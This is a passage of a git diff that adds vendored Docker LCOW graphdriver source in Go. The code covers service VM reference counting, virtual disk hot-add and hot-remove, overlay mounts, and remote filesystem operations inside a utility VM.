+func (d *Driver) setLayerChain(id string, chain []string) error { + content, err := json.Marshal(&chain) + if err != nil { + return fmt.Errorf("lcowdriver: setlayerchain: %s failed to marshall layerchain json: %s", id, err) + } + + jPath := filepath.Join(d.dir(id), "layerchain.json") + logrus.Debugf("lcowdriver: setlayerchain: id %s json %s", id, jPath) + err = ioutil.WriteFile(jPath, content, 0600) + if err != nil { + return fmt.Errorf("lcowdriver: setlayerchain: %s failed to write layerchain file: %s", id, err) + } + return nil +} + +// getLayerDetails is a utility for getting a file name, size and indication of +// sandbox for a VHD(x) in a folder. A read-only layer will be layer.vhd. A +// read-write layer will be sandbox.vhdx. +func getLayerDetails(folder string) (*layerDetails, error) { + var fileInfo os.FileInfo + ld := &layerDetails{ + isSandbox: false, + filename: filepath.Join(folder, layerFilename), + } + + fileInfo, err := os.Stat(ld.filename) + if err != nil { + ld.filename = filepath.Join(folder, sandboxFilename) + if fileInfo, err = os.Stat(ld.filename); err != nil { + return nil, fmt.Errorf("failed to locate layer or sandbox in %s", folder) + } + ld.isSandbox = true + } + ld.size = fileInfo.Size() + + return ld, nil +} + +func (d *Driver) getAllMounts(id string) ([]hcsshim.MappedVirtualDisk, error) { + layerChain, err := d.getLayerChain(id) + if err != nil { + return nil, err + } + layerChain = append([]string{d.dir(id)}, layerChain...) 
+ + logrus.Debugf("getting all layers: %v", layerChain) + disks := make([]hcsshim.MappedVirtualDisk, len(layerChain), len(layerChain)) + for i := range layerChain { + ld, err := getLayerDetails(layerChain[i]) + if err != nil { + logrus.Debugf("Failed to get LayerVhdDetails from %s: %s", layerChain[i], err) + return nil, err + } + disks[i].HostPath = ld.filename + disks[i].ContainerPath = hostToGuest(ld.filename) + disks[i].CreateInUtilityVM = true + disks[i].ReadOnly = !ld.isSandbox + } + return disks, nil +} + +func hostToGuest(hostpath string) string { + return fmt.Sprintf("/tmp/%s", filepath.Base(filepath.Dir(hostpath))) +} + +func unionMountName(disks []hcsshim.MappedVirtualDisk) string { + return fmt.Sprintf("%s-mount", disks[0].ContainerPath) +} + +type nopCloser struct { + io.Reader +} + +func (nopCloser) Close() error { + return nil +} + +type fileGetCloserFromSVM struct { + id string + svm *serviceVM + mvd *hcsshim.MappedVirtualDisk + d *Driver +} + +func (fgc *fileGetCloserFromSVM) Close() error { + if fgc.svm != nil { + if fgc.mvd != nil { + if err := fgc.svm.hotRemoveVHDs(*fgc.mvd); err != nil { + // We just log this as we're going to tear down the SVM imminently unless in global mode + logrus.Errorf("failed to remove mvd %s: %s", fgc.mvd.ContainerPath, err) + } + } + } + if fgc.d != nil && fgc.svm != nil && fgc.id != "" { + if err := fgc.d.terminateServiceVM(fgc.id, fmt.Sprintf("diffgetter %s", fgc.id), false); err != nil { + return err + } + } + return nil +} + +func (fgc *fileGetCloserFromSVM) Get(filename string) (io.ReadCloser, error) { + errOut := &bytes.Buffer{} + outOut := &bytes.Buffer{} + file := path.Join(fgc.mvd.ContainerPath, filename) + if err := fgc.svm.runProcess(fmt.Sprintf("cat %s", file), nil, outOut, errOut); err != nil { + logrus.Debugf("cat %s failed: %s", file, errOut.String()) + return nil, err + } + return nopCloser{bytes.NewReader(outOut.Bytes())}, nil +} + +// DiffGetter returns a FileGetCloser that can read files from the 
directory that +// contains files for the layer differences. Used for direct access for tar-split. +func (d *Driver) DiffGetter(id string) (graphdriver.FileGetCloser, error) { + title := fmt.Sprintf("lcowdriver: diffgetter: %s", id) + logrus.Debugf(title) + + ld, err := getLayerDetails(d.dir(id)) + if err != nil { + logrus.Debugf("%s: failed to get vhdx information of %s: %s", title, d.dir(id), err) + return nil, err + } + + // Start the SVM with a mapped virtual disk. Note that if the SVM is + // already running and we are in global mode, this will be hot-added. + mvd := hcsshim.MappedVirtualDisk{ + HostPath: ld.filename, + ContainerPath: hostToGuest(ld.filename), + CreateInUtilityVM: true, + ReadOnly: true, + } + + logrus.Debugf("%s: starting service VM", title) + svm, err := d.startServiceVMIfNotRunning(id, []hcsshim.MappedVirtualDisk{mvd}, fmt.Sprintf("diffgetter %s", id)) + if err != nil { + return nil, err + } + + logrus.Debugf("%s: waiting for svm to finish booting", title) + err = svm.getStartError() + if err != nil { + d.terminateServiceVM(id, fmt.Sprintf("diff %s", id), false) + return nil, fmt.Errorf("%s: svm failed to boot: %s", title, err) + } + + return &fileGetCloserFromSVM{ + id: id, + svm: svm, + mvd: &mvd, + d: d}, nil +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/lcow/lcow_svm.go b/vendor/github.com/docker/docker/daemon/graphdriver/lcow/lcow_svm.go new file mode 100644 index 0000000000..9a27ac9496 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/lcow/lcow_svm.go @@ -0,0 +1,378 @@ +// +build windows + +package lcow // import "github.com/docker/docker/daemon/graphdriver/lcow" + +import ( + "errors" + "fmt" + "io" + "strings" + "sync" + "time" + + "github.com/Microsoft/hcsshim" + "github.com/Microsoft/opengcs/client" + "github.com/sirupsen/logrus" +) + +// Code for all the service VM management for the LCOW graphdriver + +var errVMisTerminating = errors.New("service VM is shutting down") +var errVMUnknown = 
errors.New("service vm id is unknown") +var errVMStillHasReference = errors.New("Attemping to delete a VM that is still being used") + +// serviceVMMap is the struct representing the id -> service VM mapping. +type serviceVMMap struct { + sync.Mutex + svms map[string]*serviceVMMapItem +} + +// serviceVMMapItem is our internal structure representing an item in our +// map of service VMs we are maintaining. +type serviceVMMapItem struct { + svm *serviceVM // actual service vm object + refCount int // refcount for VM +} + +type serviceVM struct { + sync.Mutex // Serialises operations being performed in this service VM. + scratchAttached bool // Has a scratch been attached? + config *client.Config // Represents the service VM item. + + // Indicates that the vm is started + startStatus chan interface{} + startError error + + // Indicates that the vm is stopped + stopStatus chan interface{} + stopError error + + attachedVHDs map[string]int // Map ref counting all the VHDS we've hot-added/hot-removed. + unionMounts map[string]int // Map ref counting all the union filesystems we mounted. +} + +// add will add an id to the service vm map. There are three cases: +// - entry doesn't exist: +// - add id to map and return a new vm that the caller can manually configure+start +// - entry does exist +// - return vm in map and increment ref count +// - entry does exist but the ref count is 0 +// - return the svm and errVMisTerminating. 
Caller can call svm.getStopError() to wait for stop +func (svmMap *serviceVMMap) add(id string) (svm *serviceVM, alreadyExists bool, err error) { + svmMap.Lock() + defer svmMap.Unlock() + if svm, ok := svmMap.svms[id]; ok { + if svm.refCount == 0 { + return svm.svm, true, errVMisTerminating + } + svm.refCount++ + return svm.svm, true, nil + } + + // Doesn't exist, so create an empty svm to put into map and return + newSVM := &serviceVM{ + startStatus: make(chan interface{}), + stopStatus: make(chan interface{}), + attachedVHDs: make(map[string]int), + unionMounts: make(map[string]int), + config: &client.Config{}, + } + svmMap.svms[id] = &serviceVMMapItem{ + svm: newSVM, + refCount: 1, + } + return newSVM, false, nil +} + +// get will get the service vm from the map. There are three cases: +// - entry doesn't exist: +// - return errVMUnknown +// - entry does exist +// - return vm with no error +// - entry does exist but the ref count is 0 +// - return the svm and errVMisTerminating. Caller can call svm.getStopError() to wait for stop +func (svmMap *serviceVMMap) get(id string) (*serviceVM, error) { + svmMap.Lock() + defer svmMap.Unlock() + svm, ok := svmMap.svms[id] + if !ok { + return nil, errVMUnknown + } + if svm.refCount == 0 { + return svm.svm, errVMisTerminating + } + return svm.svm, nil +} + +// decrementRefCount decrements the ref count of the given ID from the map. There are four cases: +// - entry doesn't exist: +// - return errVMUnknown +// - entry does exist but the ref count is 0 +// - return the svm and errVMisTerminating. Caller can call svm.getStopError() to wait for stop +// - entry does exist but ref count is 1 +// - return vm and set lastRef to true. The caller can then stop the vm, delete the id from this map +// - and execute svm.signalStopFinished to signal the threads that the svm has been terminated. 
+// - entry does exist and ref count > 1 +// - just reduce ref count and return svm +func (svmMap *serviceVMMap) decrementRefCount(id string) (_ *serviceVM, lastRef bool, _ error) { + svmMap.Lock() + defer svmMap.Unlock() + + svm, ok := svmMap.svms[id] + if !ok { + return nil, false, errVMUnknown + } + if svm.refCount == 0 { + return svm.svm, false, errVMisTerminating + } + svm.refCount-- + return svm.svm, svm.refCount == 0, nil +} + +// setRefCountZero works the same way as decrementRefCount, but sets ref count to 0 instead of decrementing it. +func (svmMap *serviceVMMap) setRefCountZero(id string) (*serviceVM, error) { + svmMap.Lock() + defer svmMap.Unlock() + + svm, ok := svmMap.svms[id] + if !ok { + return nil, errVMUnknown + } + if svm.refCount == 0 { + return svm.svm, errVMisTerminating + } + svm.refCount = 0 + return svm.svm, nil +} + +// deleteID deletes the given ID from the map. If the refcount is not 0 or the +// VM does not exist, then this function returns an error. +func (svmMap *serviceVMMap) deleteID(id string) error { + svmMap.Lock() + defer svmMap.Unlock() + svm, ok := svmMap.svms[id] + if !ok { + return errVMUnknown + } + if svm.refCount != 0 { + return errVMStillHasReference + } + delete(svmMap.svms, id) + return nil +} + +func (svm *serviceVM) signalStartFinished(err error) { + svm.Lock() + svm.startError = err + svm.Unlock() + close(svm.startStatus) +} + +func (svm *serviceVM) getStartError() error { + <-svm.startStatus + svm.Lock() + defer svm.Unlock() + return svm.startError +} + +func (svm *serviceVM) signalStopFinished(err error) { + svm.Lock() + svm.stopError = err + svm.Unlock() + close(svm.stopStatus) +} + +func (svm *serviceVM) getStopError() error { + <-svm.stopStatus + svm.Lock() + defer svm.Unlock() + return svm.stopError +} + +// hotAddVHDs waits for the service vm to start and then attaches the vhds. 
+func (svm *serviceVM) hotAddVHDs(mvds ...hcsshim.MappedVirtualDisk) error { + if err := svm.getStartError(); err != nil { + return err + } + return svm.hotAddVHDsAtStart(mvds...) +} + +// hotAddVHDsAtStart works the same way as hotAddVHDs but does not wait for the VM to start. +func (svm *serviceVM) hotAddVHDsAtStart(mvds ...hcsshim.MappedVirtualDisk) error { + svm.Lock() + defer svm.Unlock() + for i, mvd := range mvds { + if _, ok := svm.attachedVHDs[mvd.HostPath]; ok { + svm.attachedVHDs[mvd.HostPath]++ + continue + } + + if err := svm.config.HotAddVhd(mvd.HostPath, mvd.ContainerPath, mvd.ReadOnly, !mvd.AttachOnly); err != nil { + svm.hotRemoveVHDsNoLock(mvds[:i]...) + return err + } + svm.attachedVHDs[mvd.HostPath] = 1 + } + return nil +} + +// hotRemoveVHDs waits for the service vm to start and then removes the vhds. +// The service VM must not be locked when calling this function. +func (svm *serviceVM) hotRemoveVHDs(mvds ...hcsshim.MappedVirtualDisk) error { + if err := svm.getStartError(); err != nil { + return err + } + svm.Lock() + defer svm.Unlock() + return svm.hotRemoveVHDsNoLock(mvds...) +} + +// hotRemoveVHDsNoLock removes VHDs from a service VM. When calling this function, +// the contract is the service VM lock must be held. +func (svm *serviceVM) hotRemoveVHDsNoLock(mvds ...hcsshim.MappedVirtualDisk) error { + var retErr error + for _, mvd := range mvds { + if _, ok := svm.attachedVHDs[mvd.HostPath]; !ok { + // We continue instead of returning an error if we try to hot remove a non-existent VHD. + // This is because one of the callers of the function is graphdriver.Put(). Since graphdriver.Get() + // defers the VM start to the first operation, it's possible that nothing have been hot-added + // when Put() is called. To avoid Put returning an error in that case, we simply continue if we + // don't find the vhd attached. 
+ continue + } + + if svm.attachedVHDs[mvd.HostPath] > 1 { + svm.attachedVHDs[mvd.HostPath]-- + continue + } + + // last VHD, so remove from VM and map + if err := svm.config.HotRemoveVhd(mvd.HostPath); err == nil { + delete(svm.attachedVHDs, mvd.HostPath) + } else { + // Take note of the error, but still continue to remove the other VHDs + logrus.Warnf("Failed to hot remove %s: %s", mvd.HostPath, err) + if retErr == nil { + retErr = err + } + } + } + return retErr +} + +func (svm *serviceVM) createExt4VHDX(destFile string, sizeGB uint32, cacheFile string) error { + if err := svm.getStartError(); err != nil { + return err + } + + svm.Lock() + defer svm.Unlock() + return svm.config.CreateExt4Vhdx(destFile, sizeGB, cacheFile) +} + +func (svm *serviceVM) createUnionMount(mountName string, mvds ...hcsshim.MappedVirtualDisk) (err error) { + if len(mvds) == 0 { + return fmt.Errorf("createUnionMount: error must have at least 1 layer") + } + + if err = svm.getStartError(); err != nil { + return err + } + + svm.Lock() + defer svm.Unlock() + if _, ok := svm.unionMounts[mountName]; ok { + svm.unionMounts[mountName]++ + return nil + } + + var lowerLayers []string + if mvds[0].ReadOnly { + lowerLayers = append(lowerLayers, mvds[0].ContainerPath) + } + + for i := 1; i < len(mvds); i++ { + lowerLayers = append(lowerLayers, mvds[i].ContainerPath) + } + + logrus.Debugf("Doing the overlay mount with union directory=%s", mountName) + if err = svm.runProcess(fmt.Sprintf("mkdir -p %s", mountName), nil, nil, nil); err != nil { + return err + } + + var cmd string + if len(mvds) == 1 { + // `FROM SCRATCH` case and the only layer. No overlay required. 
+ cmd = fmt.Sprintf("mount %s %s", mvds[0].ContainerPath, mountName) + } else if mvds[0].ReadOnly { + // Readonly overlay + cmd = fmt.Sprintf("mount -t overlay overlay -olowerdir=%s %s", + strings.Join(lowerLayers, ","), + mountName) + } else { + upper := fmt.Sprintf("%s/upper", mvds[0].ContainerPath) + work := fmt.Sprintf("%s/work", mvds[0].ContainerPath) + + if err = svm.runProcess(fmt.Sprintf("mkdir -p %s %s", upper, work), nil, nil, nil); err != nil { + return err + } + + cmd = fmt.Sprintf("mount -t overlay overlay -olowerdir=%s,upperdir=%s,workdir=%s %s", + strings.Join(lowerLayers, ":"), + upper, + work, + mountName) + } + + logrus.Debugf("createUnionMount: Executing mount=%s", cmd) + if err = svm.runProcess(cmd, nil, nil, nil); err != nil { + return err + } + + svm.unionMounts[mountName] = 1 + return nil +} + +func (svm *serviceVM) deleteUnionMount(mountName string, disks ...hcsshim.MappedVirtualDisk) error { + if err := svm.getStartError(); err != nil { + return err + } + + svm.Lock() + defer svm.Unlock() + if _, ok := svm.unionMounts[mountName]; !ok { + return nil + } + + if svm.unionMounts[mountName] > 1 { + svm.unionMounts[mountName]-- + return nil + } + + logrus.Debugf("Removing union mount %s", mountName) + if err := svm.runProcess(fmt.Sprintf("umount %s", mountName), nil, nil, nil); err != nil { + return err + } + + delete(svm.unionMounts, mountName) + return nil +} + +func (svm *serviceVM) runProcess(command string, stdin io.Reader, stdout io.Writer, stderr io.Writer) error { + process, err := svm.config.RunProcess(command, stdin, stdout, stderr) + if err != nil { + return err + } + defer process.Close() + + process.WaitTimeout(time.Duration(int(time.Second) * svm.config.UvmTimeoutSeconds)) + exitCode, err := process.ExitCode() + if err != nil { + return err + } + + if exitCode != 0 { + return fmt.Errorf("svm.runProcess: command %s failed with exit code %d", command, exitCode) + } + return nil +} diff --git 
a/vendor/github.com/docker/docker/daemon/graphdriver/lcow/remotefs.go b/vendor/github.com/docker/docker/daemon/graphdriver/lcow/remotefs.go new file mode 100644 index 0000000000..29f15fd24c --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/lcow/remotefs.go @@ -0,0 +1,139 @@ +// +build windows + +package lcow // import "github.com/docker/docker/daemon/graphdriver/lcow" + +import ( + "bytes" + "fmt" + "io" + "runtime" + "strings" + "sync" + + "github.com/Microsoft/hcsshim" + "github.com/Microsoft/opengcs/service/gcsutils/remotefs" + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/containerfs" + "github.com/sirupsen/logrus" +) + +type lcowfs struct { + root string + d *Driver + mappedDisks []hcsshim.MappedVirtualDisk + vmID string + currentSVM *serviceVM + sync.Mutex +} + +var _ containerfs.ContainerFS = &lcowfs{} + +// ErrNotSupported is an error for unsupported operations in the remotefs +var ErrNotSupported = fmt.Errorf("not supported") + +// Functions to implement the ContainerFS interface +func (l *lcowfs) Path() string { + return l.root +} + +func (l *lcowfs) ResolveScopedPath(path string, rawPath bool) (string, error) { + logrus.Debugf("remotefs.resolvescopedpath inputs: %s %s ", path, l.root) + + arg1 := l.Join(l.root, path) + if !rawPath { + // The l.Join("/", path) will make path an absolute path and then clean it + // so if path = ../../X, it will become /X. + arg1 = l.Join(l.root, l.Join("/", path)) + } + arg2 := l.root + + output := &bytes.Buffer{} + if err := l.runRemoteFSProcess(nil, output, remotefs.ResolvePathCmd, arg1, arg2); err != nil { + return "", err + } + + logrus.Debugf("remotefs.resolvescopedpath success. 
Output: %s\n", output.String()) + return output.String(), nil +} + +func (l *lcowfs) OS() string { + return "linux" +} + +func (l *lcowfs) Architecture() string { + return runtime.GOARCH +} + +// Other functions that are used by docker like the daemon Archiver/Extractor +func (l *lcowfs) ExtractArchive(src io.Reader, dst string, opts *archive.TarOptions) error { + logrus.Debugf("remotefs.ExtractArchve inputs: %s %+v", dst, opts) + + tarBuf := &bytes.Buffer{} + if err := remotefs.WriteTarOptions(tarBuf, opts); err != nil { + return fmt.Errorf("failed to marshall tar opts: %s", err) + } + + input := io.MultiReader(tarBuf, src) + if err := l.runRemoteFSProcess(input, nil, remotefs.ExtractArchiveCmd, dst); err != nil { + return fmt.Errorf("failed to extract archive to %s: %s", dst, err) + } + return nil +} + +func (l *lcowfs) ArchivePath(src string, opts *archive.TarOptions) (io.ReadCloser, error) { + logrus.Debugf("remotefs.ArchivePath: %s %+v", src, opts) + + tarBuf := &bytes.Buffer{} + if err := remotefs.WriteTarOptions(tarBuf, opts); err != nil { + return nil, fmt.Errorf("failed to marshall tar opts: %s", err) + } + + r, w := io.Pipe() + go func() { + defer w.Close() + if err := l.runRemoteFSProcess(tarBuf, w, remotefs.ArchivePathCmd, src); err != nil { + logrus.Debugf("REMOTEFS: Failed to extract archive: %s %+v %s", src, opts, err) + } + }() + return r, nil +} + +// Helper functions +func (l *lcowfs) startVM() error { + l.Lock() + defer l.Unlock() + if l.currentSVM != nil { + return nil + } + + svm, err := l.d.startServiceVMIfNotRunning(l.vmID, l.mappedDisks, fmt.Sprintf("lcowfs.startVM")) + if err != nil { + return err + } + + if err = svm.createUnionMount(l.root, l.mappedDisks...); err != nil { + return err + } + l.currentSVM = svm + return nil +} + +func (l *lcowfs) runRemoteFSProcess(stdin io.Reader, stdout io.Writer, args ...string) error { + if err := l.startVM(); err != nil { + return err + } + + // Append remotefs prefix and setup as a command line string 
+ cmd := fmt.Sprintf("%s %s", remotefs.RemotefsCmd, strings.Join(args, " ")) + stderr := &bytes.Buffer{} + if err := l.currentSVM.runProcess(cmd, stdin, stdout, stderr); err != nil { + return err + } + + eerr, err := remotefs.ReadError(stderr) + if eerr != nil { + // Process returned an error so return that. + return remotefs.ExportedToError(eerr) + } + return err +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/lcow/remotefs_file.go b/vendor/github.com/docker/docker/daemon/graphdriver/lcow/remotefs_file.go new file mode 100644 index 0000000000..1f00bfff46 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/lcow/remotefs_file.go @@ -0,0 +1,211 @@ +// +build windows + +package lcow // import "github.com/docker/docker/daemon/graphdriver/lcow" + +import ( + "bytes" + "encoding/binary" + "encoding/json" + "fmt" + "io" + "os" + "strconv" + + "github.com/Microsoft/hcsshim" + "github.com/Microsoft/opengcs/service/gcsutils/remotefs" + "github.com/containerd/continuity/driver" +) + +type lcowfile struct { + process hcsshim.Process + stdin io.WriteCloser + stdout io.ReadCloser + stderr io.ReadCloser + fs *lcowfs + guestPath string +} + +func (l *lcowfs) Open(path string) (driver.File, error) { + return l.OpenFile(path, os.O_RDONLY, 0) +} + +func (l *lcowfs) OpenFile(path string, flag int, perm os.FileMode) (_ driver.File, err error) { + flagStr := strconv.FormatInt(int64(flag), 10) + permStr := strconv.FormatUint(uint64(perm), 8) + + commandLine := fmt.Sprintf("%s %s %s %s %s", remotefs.RemotefsCmd, remotefs.OpenFileCmd, path, flagStr, permStr) + env := make(map[string]string) + env["PATH"] = "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:" + processConfig := &hcsshim.ProcessConfig{ + EmulateConsole: false, + CreateStdInPipe: true, + CreateStdOutPipe: true, + CreateStdErrPipe: true, + CreateInUtilityVm: true, + WorkingDirectory: "/bin", + Environment: env, + CommandLine: commandLine, + } + + process, err := 
l.currentSVM.config.Uvm.CreateProcess(processConfig) + if err != nil { + return nil, fmt.Errorf("failed to open file %s: %s", path, err) + } + + stdin, stdout, stderr, err := process.Stdio() + if err != nil { + process.Kill() + process.Close() + return nil, fmt.Errorf("failed to open file pipes %s: %s", path, err) + } + + lf := &lcowfile{ + process: process, + stdin: stdin, + stdout: stdout, + stderr: stderr, + fs: l, + guestPath: path, + } + + if _, err := lf.getResponse(); err != nil { + return nil, fmt.Errorf("failed to open file %s: %s", path, err) + } + return lf, nil +} + +func (l *lcowfile) Read(b []byte) (int, error) { + hdr := &remotefs.FileHeader{ + Cmd: remotefs.Read, + Size: uint64(len(b)), + } + + if err := remotefs.WriteFileHeader(l.stdin, hdr, nil); err != nil { + return 0, err + } + + buf, err := l.getResponse() + if err != nil { + return 0, err + } + + n := copy(b, buf) + return n, nil +} + +func (l *lcowfile) Write(b []byte) (int, error) { + hdr := &remotefs.FileHeader{ + Cmd: remotefs.Write, + Size: uint64(len(b)), + } + + if err := remotefs.WriteFileHeader(l.stdin, hdr, b); err != nil { + return 0, err + } + + _, err := l.getResponse() + if err != nil { + return 0, err + } + + return len(b), nil +} + +func (l *lcowfile) Seek(offset int64, whence int) (int64, error) { + seekHdr := &remotefs.SeekHeader{ + Offset: offset, + Whence: int32(whence), + } + + buf := &bytes.Buffer{} + if err := binary.Write(buf, binary.BigEndian, seekHdr); err != nil { + return 0, err + } + + hdr := &remotefs.FileHeader{ + Cmd: remotefs.Write, + Size: uint64(buf.Len()), + } + if err := remotefs.WriteFileHeader(l.stdin, hdr, buf.Bytes()); err != nil { + return 0, err + } + + resBuf, err := l.getResponse() + if err != nil { + return 0, err + } + + var res int64 + if err := binary.Read(bytes.NewBuffer(resBuf), binary.BigEndian, &res); err != nil { + return 0, err + } + return res, nil +} + +func (l *lcowfile) Close() error { + hdr := &remotefs.FileHeader{ + Cmd: 
remotefs.Close, + Size: 0, + } + + if err := remotefs.WriteFileHeader(l.stdin, hdr, nil); err != nil { + return err + } + + _, err := l.getResponse() + return err +} + +func (l *lcowfile) Readdir(n int) ([]os.FileInfo, error) { + nStr := strconv.FormatInt(int64(n), 10) + + // Unlike the other File functions, this one can just be run without maintaining state, + // so just do the normal runRemoteFSProcess way. + buf := &bytes.Buffer{} + if err := l.fs.runRemoteFSProcess(nil, buf, remotefs.ReadDirCmd, l.guestPath, nStr); err != nil { + return nil, err + } + + var info []remotefs.FileInfo + if err := json.Unmarshal(buf.Bytes(), &info); err != nil { + return nil, err + } + + osInfo := make([]os.FileInfo, len(info)) + for i := range info { + osInfo[i] = &info[i] + } + return osInfo, nil +} + +func (l *lcowfile) getResponse() ([]byte, error) { + hdr, err := remotefs.ReadFileHeader(l.stdout) + if err != nil { + return nil, err + } + + if hdr.Cmd != remotefs.CmdOK { + // Something went wrong during the openfile in the server. + // Parse stderr and return that as an error + eerr, err := remotefs.ReadError(l.stderr) + if eerr != nil { + return nil, remotefs.ExportedToError(eerr) + } + + // Maybe the parsing went wrong? + if err != nil { + return nil, err + } + + // At this point, we know something went wrong in the remotefs program, but + // we we don't know why. 
+ return nil, fmt.Errorf("unknown error") + } + + // Successful command, we might have some data to read (for Read + Seek) + buf := make([]byte, hdr.Size, hdr.Size) + if _, err := io.ReadFull(l.stdout, buf); err != nil { + return nil, err + } + return buf, nil +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/lcow/remotefs_filedriver.go b/vendor/github.com/docker/docker/daemon/graphdriver/lcow/remotefs_filedriver.go new file mode 100644 index 0000000000..f335868af6 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/lcow/remotefs_filedriver.go @@ -0,0 +1,123 @@ +// +build windows + +package lcow // import "github.com/docker/docker/daemon/graphdriver/lcow" + +import ( + "bytes" + "encoding/json" + "os" + "strconv" + + "github.com/Microsoft/opengcs/service/gcsutils/remotefs" + + "github.com/containerd/continuity/driver" + "github.com/sirupsen/logrus" +) + +var _ driver.Driver = &lcowfs{} + +func (l *lcowfs) Readlink(p string) (string, error) { + logrus.Debugf("removefs.readlink args: %s", p) + + result := &bytes.Buffer{} + if err := l.runRemoteFSProcess(nil, result, remotefs.ReadlinkCmd, p); err != nil { + return "", err + } + return result.String(), nil +} + +func (l *lcowfs) Mkdir(path string, mode os.FileMode) error { + return l.mkdir(path, mode, remotefs.MkdirCmd) +} + +func (l *lcowfs) MkdirAll(path string, mode os.FileMode) error { + return l.mkdir(path, mode, remotefs.MkdirAllCmd) +} + +func (l *lcowfs) mkdir(path string, mode os.FileMode, cmd string) error { + modeStr := strconv.FormatUint(uint64(mode), 8) + logrus.Debugf("remotefs.%s args: %s %s", cmd, path, modeStr) + return l.runRemoteFSProcess(nil, nil, cmd, path, modeStr) +} + +func (l *lcowfs) Remove(path string) error { + return l.remove(path, remotefs.RemoveCmd) +} + +func (l *lcowfs) RemoveAll(path string) error { + return l.remove(path, remotefs.RemoveAllCmd) +} + +func (l *lcowfs) remove(path string, cmd string) error { + logrus.Debugf("remotefs.%s args: %s", 
cmd, path) + return l.runRemoteFSProcess(nil, nil, cmd, path) +} + +func (l *lcowfs) Link(oldname, newname string) error { + return l.link(oldname, newname, remotefs.LinkCmd) +} + +func (l *lcowfs) Symlink(oldname, newname string) error { + return l.link(oldname, newname, remotefs.SymlinkCmd) +} + +func (l *lcowfs) link(oldname, newname, cmd string) error { + logrus.Debugf("remotefs.%s args: %s %s", cmd, oldname, newname) + return l.runRemoteFSProcess(nil, nil, cmd, oldname, newname) +} + +func (l *lcowfs) Lchown(name string, uid, gid int64) error { + uidStr := strconv.FormatInt(uid, 10) + gidStr := strconv.FormatInt(gid, 10) + + logrus.Debugf("remotefs.lchown args: %s %s %s", name, uidStr, gidStr) + return l.runRemoteFSProcess(nil, nil, remotefs.LchownCmd, name, uidStr, gidStr) +} + +// Lchmod changes the mode of an file not following symlinks. +func (l *lcowfs) Lchmod(path string, mode os.FileMode) error { + modeStr := strconv.FormatUint(uint64(mode), 8) + logrus.Debugf("remotefs.lchmod args: %s %s", path, modeStr) + return l.runRemoteFSProcess(nil, nil, remotefs.LchmodCmd, path, modeStr) +} + +func (l *lcowfs) Mknod(path string, mode os.FileMode, major, minor int) error { + modeStr := strconv.FormatUint(uint64(mode), 8) + majorStr := strconv.FormatUint(uint64(major), 10) + minorStr := strconv.FormatUint(uint64(minor), 10) + + logrus.Debugf("remotefs.mknod args: %s %s %s %s", path, modeStr, majorStr, minorStr) + return l.runRemoteFSProcess(nil, nil, remotefs.MknodCmd, path, modeStr, majorStr, minorStr) +} + +func (l *lcowfs) Mkfifo(path string, mode os.FileMode) error { + modeStr := strconv.FormatUint(uint64(mode), 8) + logrus.Debugf("remotefs.mkfifo args: %s %s", path, modeStr) + return l.runRemoteFSProcess(nil, nil, remotefs.MkfifoCmd, path, modeStr) +} + +func (l *lcowfs) Stat(p string) (os.FileInfo, error) { + return l.stat(p, remotefs.StatCmd) +} + +func (l *lcowfs) Lstat(p string) (os.FileInfo, error) { + return l.stat(p, remotefs.LstatCmd) +} + +func (l 
*lcowfs) stat(path string, cmd string) (os.FileInfo, error) { + logrus.Debugf("remotefs.stat inputs: %s %s", cmd, path) + + output := &bytes.Buffer{} + err := l.runRemoteFSProcess(nil, output, cmd, path) + if err != nil { + return nil, err + } + + var fi remotefs.FileInfo + if err := json.Unmarshal(output.Bytes(), &fi); err != nil { + return nil, err + } + + logrus.Debugf("remotefs.stat success. got: %v\n", fi) + return &fi, nil +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/lcow/remotefs_pathdriver.go b/vendor/github.com/docker/docker/daemon/graphdriver/lcow/remotefs_pathdriver.go new file mode 100644 index 0000000000..74895b0465 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/lcow/remotefs_pathdriver.go @@ -0,0 +1,212 @@ +// +build windows + +package lcow // import "github.com/docker/docker/daemon/graphdriver/lcow" + +import ( + "errors" + "os" + pathpkg "path" + "path/filepath" + "sort" + "strings" + + "github.com/containerd/continuity/pathdriver" +) + +var _ pathdriver.PathDriver = &lcowfs{} + +// Continuity Path functions can be done locally +func (l *lcowfs) Join(path ...string) string { + return pathpkg.Join(path...) +} + +func (l *lcowfs) IsAbs(path string) bool { + return pathpkg.IsAbs(path) +} + +func sameWord(a, b string) bool { + return a == b +} + +// Implementation taken from the Go standard library +func (l *lcowfs) Rel(basepath, targpath string) (string, error) { + baseVol := "" + targVol := "" + base := l.Clean(basepath) + targ := l.Clean(targpath) + if sameWord(targ, base) { + return ".", nil + } + base = base[len(baseVol):] + targ = targ[len(targVol):] + if base == "." { + base = "" + } + // Can't use IsAbs - `\a` and `a` are both relative in Windows. 
+ baseSlashed := len(base) > 0 && base[0] == l.Separator() + targSlashed := len(targ) > 0 && targ[0] == l.Separator() + if baseSlashed != targSlashed || !sameWord(baseVol, targVol) { + return "", errors.New("Rel: can't make " + targpath + " relative to " + basepath) + } + // Position base[b0:bi] and targ[t0:ti] at the first differing elements. + bl := len(base) + tl := len(targ) + var b0, bi, t0, ti int + for { + for bi < bl && base[bi] != l.Separator() { + bi++ + } + for ti < tl && targ[ti] != l.Separator() { + ti++ + } + if !sameWord(targ[t0:ti], base[b0:bi]) { + break + } + if bi < bl { + bi++ + } + if ti < tl { + ti++ + } + b0 = bi + t0 = ti + } + if base[b0:bi] == ".." { + return "", errors.New("Rel: can't make " + targpath + " relative to " + basepath) + } + if b0 != bl { + // Base elements left. Must go up before going down. + seps := strings.Count(base[b0:bl], string(l.Separator())) + size := 2 + seps*3 + if tl != t0 { + size += 1 + tl - t0 + } + buf := make([]byte, size) + n := copy(buf, "..") + for i := 0; i < seps; i++ { + buf[n] = l.Separator() + copy(buf[n+1:], "..") + n += 3 + } + if t0 != tl { + buf[n] = l.Separator() + copy(buf[n+1:], targ[t0:]) + } + return string(buf), nil + } + return 